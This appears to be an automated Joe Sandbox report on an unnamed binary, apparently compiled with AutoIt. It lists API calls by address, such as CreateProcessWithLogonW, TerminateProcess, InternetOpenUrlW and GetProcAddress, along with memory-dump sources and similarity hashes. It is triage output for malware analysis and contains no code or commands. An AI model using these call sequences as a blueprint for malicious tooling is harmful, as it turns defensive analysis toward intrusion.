                                                                                                                                                                              • Opcode ID: d0e5bb6dac6e5c3da55c057a2262da66b6264aa1ff4380d5dfd5b362b5fbe22b
                                                                                                                                                                              • Instruction ID: ebf9cd61160008367a40abc72893217cb465169dd76540bb35cdd9e62a3a6427
                                                                                                                                                                              • Opcode Fuzzy Hash: d0e5bb6dac6e5c3da55c057a2262da66b6264aa1ff4380d5dfd5b362b5fbe22b
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A51AD71A00215AFDF11EF65C841AEEBBF4FF48714F14445AE911BB351CB74AE418BA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F552E
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5579
                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 004F5599
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004F55CD
                                                                                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 004F562B
                                                                                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004F565C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3311875123-0
                                                                                                                                                                              • Opcode ID: d3573fefcf71071f73b2c950d744703bafcb9a6cb5671e9450f9e82ce4f6b8e3
                                                                                                                                                                              • Instruction ID: 28ba749e939a594dd7fb44ad7c88e1317dae7c14718c3971afe725b0ab9dca8f
                                                                                                                                                                              • Opcode Fuzzy Hash: d3573fefcf71071f73b2c950d744703bafcb9a6cb5671e9450f9e82ce4f6b8e3
                                                                                                                                                                              • Instruction Fuzzy Hash: 1251B070600A0DABEF10CF68D888BBEBBF5AF15318F50411AE729DA290D7789945CB59
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 004CB1C1
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CB225
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004CB242
                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004CB253
                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 004CB29D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1827037458-0
                                                                                                                                                                              • Opcode ID: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                                                                                                                                              • Instruction ID: 7874a76e0149a7acf3b9d3705c23edc4bf370fe3c2a296813cec8d099864fdb3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6641E2741006009FC711DF28EC89F6A3BF8FF59364F04056DF9A9872A1C7359849EBA6
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E21B
                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 0051E23F
                                                                                                                                                                              • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E29F
                                                                                                                                                                              • ShowWindow.USER32(?,00000004,?,?,00571810,00571810,?,0052E2D6), ref: 0051E2B1
                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 0051E2D5
                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0051E2F8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                              • Opcode ID: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                                                                                                                                              • Instruction ID: 3546bf9686f9a80ed057385eb56ef19f2a00f5fb75e37e63064e60d5eb63e8fa
                                                                                                                                                                              • Opcode Fuzzy Hash: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                                                                                                                                              • Instruction Fuzzy Hash: F5412F38600141EFEB26CF54C4AABD47FF5BB06314F1841B9EE698F6A2C771A885CB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004EBCD9
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004EBCE0
                                                                                                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004EBCEF
                                                                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 004EBCFA
                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004EBD29
                                                                                                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 004EBD3D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1413079979-0
                                                                                                                                                                              • Opcode ID: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                                                                                                                                              • Instruction ID: f37c99ab4e50f8c439dd18181343a8346353e68ef65ce7a52e7971bcbb487def
                                                                                                                                                                              • Opcode Fuzzy Hash: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                                                                                                                                              • Instruction Fuzzy Hash: A3217F72104249ABCF029F99ED49FEF7BB9EF04305F104055FE01A2260C77A8D65EBA5
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                                • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                                                                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0051E9F2
                                                                                                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0051EA06
                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051EA14
                                                                                                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0051EA24
                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 0051EA34
                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 0051EA44
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 004EEFB6
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 004EEFC7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004EEFCE
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004EEFD6
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004EEFED
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 004EEFFF
                                                                                                                                                                                • Part of subcall function 004EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004EA79D,00000000,00000000,?,004EAB73), ref: 004EB2CA
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 603618608-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __init_pointers.LIBCMT ref: 004D87D7
                                                                                                                                                                                • Part of subcall function 004D1E5A: __initp_misc_winsig.LIBCMT ref: 004D1E7E
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D8BE1
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D8BF5
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D8C08
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D8C1B
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D8C2E
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D8C41
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D8C54
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004D8C67
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D8C7A
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D8C8D
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D8CA0
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D8CB3
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D8CC6
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D8CD9
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D8CEC
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D8CFF
                                                                                                                                                                              • __mtinitlocks.LIBCMT ref: 004D87DC
                                                                                                                                                                                • Part of subcall function 004D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0056AC68,00000FA0,?,?,004D87E1,004D6AFA,005667D8,00000014), ref: 004D8AD1
                                                                                                                                                                              • __mtterm.LIBCMT ref: 004D87E5
                                                                                                                                                                                • Part of subcall function 004D884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004D87EA,004D6AFA,005667D8,00000014), ref: 004D89CF
                                                                                                                                                                                • Part of subcall function 004D884D: _free.LIBCMT ref: 004D89D6
                                                                                                                                                                                • Part of subcall function 004D884D: DeleteCriticalSection.KERNEL32(0056AC68,?,?,004D87EA,004D6AFA,005667D8,00000014), ref: 004D89F8
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004D880A
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004D8833
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2942034483-0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1423608774-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004B1898
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 004B18A0
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004B18AB
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004B18B6
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004B18BE
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004B18C6
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004F8504
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004F851A
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 004F8529
                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8538
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8542
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8549
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 004FA330
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA341
                                                                                                                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA34E
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA35B
                                                                                                                                                                                • Part of subcall function 004F9CCE: CloseHandle.KERNEL32(?,?,004FA368,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004F9CD8
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA36E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA375
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memmove.LIBCMT ref: 004BC419
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,004F6653,?,?,00000000), ref: 004BC495
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead_memmove
                                                                                                                                                                              • String ID: SfO
                                                                                                                                                                              • API String ID: 1325644223-1149229531
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 004BBBD9: _memmove.LIBCMT ref: 004BBC33
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004CD98F
                                                                                                                                                                              Strings
                                                                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004CD832
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B4A8
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 0050B5B7
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B73A
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantInit.OLEAUT32(00000000), ref: 004FA736
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantCopy.OLEAUT32(?,?), ref: 004FA73F
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantClear.OLEAUT32(?), ref: 004FA74B
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5E56
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 004F5E85
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F5F31
                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004F5F5B
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F10B8
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F10EE
                                                                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F10FF
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F1181
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                              • String ID: DllGetClassObject
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5A93
                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 004F5AAF
                                                                                                                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004F5AF5
                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005718F0,00000000), ref: 004F5B3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                                                                                                                                                • Part of subcall function 004B7F40: _memmove.LIBCMT ref: 004B7F8F
                                                                                                                                                                                • Part of subcall function 004BA2FB: _memmove.LIBCMT ref: 004BA33D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$BuffCharLower
                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004EC684
                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004EC697
                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 004EC6C7
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504A86
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00504AB6
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                                                                                                                                                • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0052454E
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • _memset.LIBCMT ref: 004B3965
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004B39B5
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                              • String ID: Line:
                                                                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00518F69
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00518F70
                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00518F85
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00518F8D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FE392
                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 004FE3E6
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FE3FF
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054DBF0), ref: 004FE43D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                                • Part of subcall function 004ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                                                                                                                                                • Part of subcall function 004ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
